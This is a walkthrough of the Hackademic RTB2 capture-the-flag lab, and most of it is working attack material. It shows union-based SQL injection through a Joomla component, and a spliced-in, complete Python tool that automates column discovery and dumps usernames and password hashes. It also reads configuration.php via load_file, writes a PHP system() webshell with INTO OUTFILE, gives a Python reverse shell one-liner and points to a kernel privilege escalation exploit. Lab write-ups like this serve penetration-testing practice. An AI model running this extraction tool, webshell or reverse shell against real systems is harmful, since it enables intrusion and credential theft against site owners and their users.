Hackademic RTB2


  • Netdiscover
  • Nmap
  • Wfuzz
  • Nikto
  • Joomscan
  • Metasploit


Linux Kernel 2.6.36-rc8 - RDS Protocol Local Privilege Escalation

Use netdiscover to find the target's IP address:

netdiscover -i eth0 -r

The host it reports is the target.

Then run nmap to find the open ports and the services running on the target machine:

nmap -sV -v -O -A -T5 -p-

Port 80 is open and port 666 is filtered.

Use wfuzz to brute-force directories on the web server:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

It finds phpmyadmin.

The web page needs a login. I try SQL injection to bypass the authentication, but it doesn't work. Now step back and enumerate more.

I use nmap to scan the target again and find that port 666 is now open, so there may be some port knocking involved.

Run wfuzz again, this time against the service on port 666:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

Check the web page.

It looks like Joomla.

Now use Joomscan to scan the app:

joomscan -u

Nothing interesting comes out.

Use Metasploit:

search joomla

I use auxiliary/scanner/http/joomla_plugins:

msf > use auxiliary/scanner/http/joomla_plugins
msf auxiliary(joomla_plugins) > set rhosts
msf auxiliary(joomla_plugins) > set rport 666
msf auxiliary(joomla_plugins) > run

The scan turns up the com_abc component, reached through /index.php?option=com_abc&view=abc&letter=AS&sectionid=

First step, verify the SQL injection in the sectionid parameter by appending a single quote: sectionid='

Then find the number of columns with ORDER BY, increasing until the query errors: order by 1-- order by 2-- order by 3--

The query breaks at 3, so the column number is 2.

Next, find out which column is reflected in the page:

158:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1 union all select 1,2--

Okay, column 2 is the one we can use.

Check the MySQL version: union all select 1,@@version--

Get all table names: union all select 1, table_name from information_schema.tables--

Get all column names of the table jos_users: union all select 1, column_name from information_schema.columns where table_name = 'jos_users'--

Next, get the username and password columns: union all select 1, concat(username,0x20,password) from jos_users--

The stored format is hash:salt, which is Joomla 1.5's password scheme: md5(password + salt) followed by the 32-character salt.
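The extraction chain above (column count, reflected column, information_schema, jos_users) as an added example that automates the same requests; this is my code, not the write-up's. It assumes the page's injection point in the sectionid parameter, a placeholder host TARGET, and a constructed stand-in for the vulnerable page (fake_fetch) so the chain can be exercised offline; swap in http_fetch to run it against the lab box.

```python
"""Union-based extraction through the injectable sectionid parameter (added example)."""
import re
from urllib.parse import quote
from urllib.request import urlopen

# Assumption: TARGET is a placeholder for the lab box; the path is the page's injection point.
BASE_URL = "http://TARGET:666/index.php?option=com_abc&view=abc&letter=AS&sectionid="

# Every injected value is wrapped in "[[" / "]]" (sent as hex so no quotes are needed)
# so it can be pulled out of the HTML no matter where the template puts it.
OPEN, CLOSE = "0x5b5b", "0x5d5d"
MARKED = re.compile(r"\[\[(.*?)\]\]", re.S)
PREFIX = "1 union all select "


def http_fetch(payload):
    """Send the payload as the sectionid value and return the response body."""
    with urlopen(BASE_URL + quote(payload, safe="")) as resp:
        return resp.read().decode("utf-8", "replace")


def column_count(fetch, max_cols=20):
    """ORDER BY n succeeds until n exceeds the column count; the first error gives the count."""
    for n in range(1, max_cols + 1):
        if "Unknown column" in fetch(f"1 order by {n}-- "):
            return n - 1
    raise RuntimeError(f"no ORDER BY error up to {max_cols} columns")


def union_payload(cols, pos, expr, from_clause=None):
    """'1 union all select 1,2,...' with column `pos` replaced by the marked expression."""
    fields = [str(i) for i in range(1, cols + 1)]
    fields[pos - 1] = f"concat({OPEN},{expr},{CLOSE})"
    tail = f" from {from_clause}" if from_clause else ""
    return PREFIX + ",".join(fields) + tail + "-- "


def reflected_columns(fetch, cols):
    """Mark every column at once; the numbers that come back are the echoed columns."""
    fields = [f"concat({OPEN},{i},{CLOSE})" for i in range(1, cols + 1)]
    return [int(v) for v in MARKED.findall(fetch(PREFIX + ",".join(fields) + "-- "))]


def extract(fetch, cols, pos, expr, from_clause=None):
    """Return the marked values the page echoes for one injected expression."""
    return MARKED.findall(fetch(union_payload(cols, pos, expr, from_clause)))


def dump_users(fetch):
    """The write-up's chain end to end. group_concat packs a whole column into one request
    (MySQL truncates it at group_concat_max_len, 1024 bytes by default, so page large tables)."""
    cols = column_count(fetch)
    pos = reflected_columns(fetch, cols)[0]
    version = extract(fetch, cols, pos, "@@version")[0]
    tables = extract(fetch, cols, pos, "group_concat(table_name)",
                     "information_schema.tables where table_schema=database()")[0].split(",")
    columns = extract(fetch, cols, pos, "group_concat(column_name)",  # 0x6a6f... is 'jos_users'
                      "information_schema.columns where table_name=0x6a6f735f7573657273")[0].split(",")
    rows = extract(fetch, cols, pos, "group_concat(username,0x3a,password)", "jos_users")[0].split(",")
    creds = dict(r.split(":", 1) for r in rows)          # username -> "hash:salt"
    return {"columns": cols, "reflected": pos, "version": version,
            "tables": tables, "user_columns": columns, "creds": creds}


# Constructed stand-in for the vulnerable page: two columns, only the second echoed,
# and a few canned rows (the hashes and salts below are placeholders, not real data).
FAKE_DB = {
    ("@@version", None): "5.1.41-3ubuntu12.6",
    ("group_concat(table_name)", "information_schema.tables where table_schema=database()"): "jos_content,jos_users",
    ("group_concat(column_name)", "information_schema.columns where table_name=0x6a6f735f7573657273"): "id,name,username,email,password",
    ("group_concat(username,0x3a,password)", "jos_users"): "JSmith:" + "aa" * 16 + ":" + "s1" * 8 + ",BTallor:" + "bb" * 16 + ":" + "s2" * 8,
}


def _split_top(s):
    """Split a select list on commas that are not inside parentheses."""
    out, cur, depth = [], "", 0
    for ch in s:
        depth += ch == "("
        depth -= ch == ")"
        if ch == "," and depth == 0:
            out.append(cur)
            cur = ""
        else:
            cur += ch
    return out + [cur]


def fake_fetch(payload):
    m = re.fullmatch(r"1 order by (\d+)-- ", payload)
    if m:
        return "Unknown column '%s' in 'order clause'" % m.group(1) if int(m.group(1)) > 2 else "<html>ok</html>"
    if not payload.startswith(PREFIX) or not payload.endswith("-- "):
        return "<html>ok</html>"
    select_list, _, from_clause = payload[len(PREFIX):-3].partition(" from ")
    col2 = _split_top(select_list)[1]
    inner = re.fullmatch(rf"concat\({OPEN},(.*),{CLOSE}\)", col2)
    if not inner:
        return "<html>ok</html>"
    value = FAKE_DB.get((inner.group(1), from_clause or None), inner.group(1))
    return f"<html><td>[[{value}]]</td></html>"
```

Against the real box the only change is dump_users(http_fetch); the fake exists so the parsing and payload logic can be checked without a target.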

Use my previous Joomla hash cracking script crackjoomla.py:

./crackjoomla.py 992396d7fc19fd76393f359cb294e300 70NFLkBrApLamH9VNGjlViJLlJsB60KF /usr/share/wordlists/rockyou.txt

For administrator, I didn't get the password.

For JSmith the password is matrix; for BTallor the password is victim.

Log in as JSmith. There is nowhere to upload a webshell, so read the Joomla configuration.php file through the injection: union all select 1, load_file('/var/www/configuration.php')--

It contains the database username and password. Use them to log in to phpmyadmin.

Now I will create a backdoor using MySQL. This needs the MySQL account to have the FILE privilege, /var/www to be writable by the mysql process, and secure_file_priv not to restrict where INTO OUTFILE may write:

create database pwn;
create table backdoor(script text);
insert into backdoor(script) values('<?php echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; ?>');
select * into outfile "/var/www/backdoor3.php" from backdoor;

Request backdoor3.php with a cmd parameter to check that the backdoor executes commands.


Set up a netcat listener on port 443 and send a Python reverse shell through the backdoor, with the listener's address in the connect() call:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

uname -a

The kernel version is 2.6.32. The matching exploit is Linux Kernel 2.6.36-rc8 - RDS Protocol Local Privilege Escalation (CVE-2010-3904), which affects 2.6.30 through 2.6.36-rc8, so 2.6.32 is in range; it relies on the kernel being able to create RDS sockets, which loads the rds module on demand.